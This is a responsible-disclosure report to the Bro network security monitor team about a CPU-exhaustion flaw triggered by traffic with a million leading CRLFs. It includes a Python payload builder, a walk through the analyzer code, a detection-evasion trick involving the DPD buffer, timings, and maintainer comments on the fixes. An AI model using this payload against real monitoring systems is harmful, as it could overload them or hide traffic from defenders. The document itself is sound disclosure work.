Dear Bro Development Team,
in the following, we describe an issue in the ContentLine_Analyzer::DoDeliverOnce() function that could be exploited by an adversary to cause high CPU utilization over a prolonged period of time on the system running the Bro NSM. The issue was discovered during a Master’s thesis project at the Karlsruhe Institute of Technology in Germany.
An attacker can send specially crafted application-layer network traffic to the Bro NSM in order to cause a high CPU utilization over a prolonged period of time. The specially crafted traffic is not restricted to a certain protocol and different application-layer protocols such as HTTP can be used for the attack. If the DPD’s port detection mechanism is turned off or if the attack traffic is sent to non-well-known ports, the issue is not triggered. Instead, the attacker can evade detection at the application-layer (e.g. no http.log is created for the specially crafted HTTP traffic).
Attack Traffic Format
Many server applications accept traffic that is not well-formed and treat it as a valid request. We found that application-layer traffic with leading “\r\n” (CRLF) bytes in front of the actual application-layer protocol content is often accepted by server applications. While the server applications simply ignore the leading CRLFs, Bro does not. The more CRLFs are put in front of the actual request, the longer it takes Bro to process it. For the rest of this description, we assume a minimal HTTP request with one million leading CRLFs, i.e. “\r\n...<1 000 000 times>...\r\nGET / HTTP/1.0\r\n\r\n”.
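For illustration, the traffic format described above can be written down as a byte string. This is only a minimal sketch for building test input in a lab setup; the function name build_payload and its parameters are hypothetical and not part of Bro.

```python
def build_payload(n_crlf: int = 1_000_000,
                  request: bytes = b"GET / HTTP/1.0\r\n\r\n") -> bytes:
    """Return n_crlf leading CRLF pairs followed by a minimal HTTP request."""
    if n_crlf < 0:
        raise ValueError("n_crlf must be non-negative")
    return b"\r\n" * n_crlf + request


# Small example with three leading CRLFs instead of one million.
print(build_payload(3))  # b'\r\n\r\n\r\nGET / HTTP/1.0\r\n\r\n'
```

With the default of one million CRLFs, the payload is 2 000 018 bytes long: two bytes per CRLF plus the 18-byte request.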
If the aforementioned attack traffic is sent to port 80, the HTTP Analyzer will be triggered. The ContentLine Analyzer will also be triggered. At some point, the traffic is passed to the ContentLine Analyzer, which passes it to the application-layer analyzer (in this example: the HTTP Analyzer). This happens as follows:
1. The “malicious” \r\n...\r\n traffic is passed to ContentLine_Analyzer::DeliverStream() in the data parameter.
2. The data is then passed to ContentLine_Analyzer::DoDeliver().
3. The data is then passed to ContentLine_Analyzer::DoDeliverOnce(). This is where the source of the problem is located.
4. The DoDeliverOnce() function iterates through the data, which would normally contain something like “GET / HTTP/1.0”. However, in our case the data contains a lot of CRLFs.
5. In every iteration, the
case is taken. The EMIT_LINE macro would then normally forward the data in its buf variable to the SupportAnalyzer, which in our case is the HTTP Analyzer. However, as the data contains only CRLFs, the buf variable contains nothing.
6. The empty buf variable is passed as the data to SupportAnalyzer::ForwardStream(), which forwards it to the application-layer analyzer: HTTP_Analyzer::DeliverStream().
7. Because data is empty for the HTTP Analyzer, it calls Weird("empty http request");
8. Finally, the function call stack returns to ContentLine_Analyzer::DoDeliver().
9. Here, two bytes are subtracted from the len variable via len -= n; and the process starts again for the next two bytes until there are no more CRLFs. We suspect this takes a very long time and is the reason for the issue we have discovered.
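The steps above can be approximated with a small model. The following is a simplified sketch and not Bro's actual code: split_lines and count_deliveries are hypothetical names, and the deliver callback merely stands in for the forwarding to the application-layer analyzer. It shows that every leading CRLF results in one separate delivery of an empty line, so the number of upper-layer calls grows linearly with the number of CRLFs.

```python
from typing import Callable, List, Tuple


def split_lines(data: bytes, deliver: Callable[[bytes], None]) -> None:
    """Call deliver() once per CRLF-terminated line, including empty lines."""
    start = 0
    while True:
        end = data.find(b"\r\n", start)
        if end == -1:
            break  # a real analyzer would buffer the unterminated remainder
        deliver(data[start:end])  # empty for every leading CRLF
        start = end + 2  # consume the two CRLF bytes, as in step 9


def count_deliveries(n_crlf: int) -> Tuple[int, int]:
    """Return (empty, non_empty) delivery counts for n_crlf leading CRLFs."""
    lines: List[bytes] = []
    split_lines(b"\r\n" * n_crlf + b"GET / HTTP/1.0\r\n\r\n", lines.append)
    empty = sum(1 for line in lines if not line)
    return empty, len(lines) - empty


print(count_deliveries(1000))  # (1001, 1)
```

The count of 1001 empty deliveries consists of the 1000 leading CRLFs plus the blank line that terminates the request. In this model each empty delivery is cheap; in Bro, each one additionally walks the call chain described above and raises a weird, which is the suspected source of the CPU cost.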
If the attack traffic is sent to a port that is unknown to the DPD, the attacker can evade application-layer detection (e.g. no http.log is created). We suspect this is due to the buffer of the PIA being full with CRLFs before the actual protocol contents could be analyzed. The observed application-layer evasion behavior is most likely not a flaw but a deliberate design decision. Users can probably change the PIA buffer size using the dpd_buffer_size variable to mitigate the problem.
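The suspected evasion mechanism can be illustrated with a simplified model of a fixed-size detection buffer. This is a sketch under assumptions: request_visible_in_buffer is a hypothetical helper, the buffer sizes are example values chosen for illustration, and the real PIA matching logic is more involved than a substring check.

```python
def request_visible_in_buffer(payload: bytes, buffer_size: int,
                              marker: bytes = b"GET ") -> bool:
    """Return True if marker lies entirely within the first buffer_size bytes."""
    return marker in payload[:buffer_size]


# 1000 leading CRLFs occupy 2000 bytes before the request line starts.
payload = b"\r\n" * 1000 + b"GET / HTTP/1.0\r\n\r\n"

print(request_visible_in_buffer(payload, 1024))  # False
print(request_visible_in_buffer(payload, 4096))  # True
```

In this model, enlarging the buffer only helps as long as it exceeds the number of leading CRLF bytes, so an attacker could respond by sending more CRLFs.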
Different application-layer protocols were tested and all of them had a significant CPU utilization impact.
The host system was an Ubuntu 16.04.4 machine with two 2.00 GHz Intel Xeon E5504 quad-core CPUs (for a total of eight CPU cores) and 24 GB of RAM.
When measured with the time utility, the processing of a packet capture file containing the previously described HTTP attack traffic sent to port 80 took about 65 seconds.
In comparison, when using random (= non-well-known) ports or turning off port detection with the dpd_ignore_ports = T option in bro/scripts/base/init-bare.bro, the processing of the same network traffic took only about 0.7 seconds.
Similar significant timing differences were observed on other machines, operating systems, and in VMs. The measurements were made using the command:
time /path/to/bro -Cr /path/to/capturefile.pcap
(The -C option was needed because the capture file was created on a machine with checksum offloading enabled; it has no effect on the discovered issue.)
Affected Bro Versions
All versions from Bro 2.5.1 up to the latest development version as of July 18th, 2018 have been tested and are affected.
While not tested, we suspect that many earlier versions that employ the current DPD design are also affected.
We would be very interested in your opinions about our findings.
The important new information there is the part of the SMTP analyzer still holding on to some state in such a case, leading to discovery that SMTP command string comparisons were based on user-supplied data/length, fixed in:
And extra/precautionary fix for if one were actually to try to queue up an excessive number of valid commands w/ the goal of exhausting memory:
Both on topic/jsiwek/empty-lines branch now (no test suite changes).
Do we want to add the traces to the test suite?
Reviewed and looks good, assigning back to Jon for merge.
Merged to master. Here's all the bits that should go in to a 2.5.5 release:
The changes are in master and 2.5.5 release now.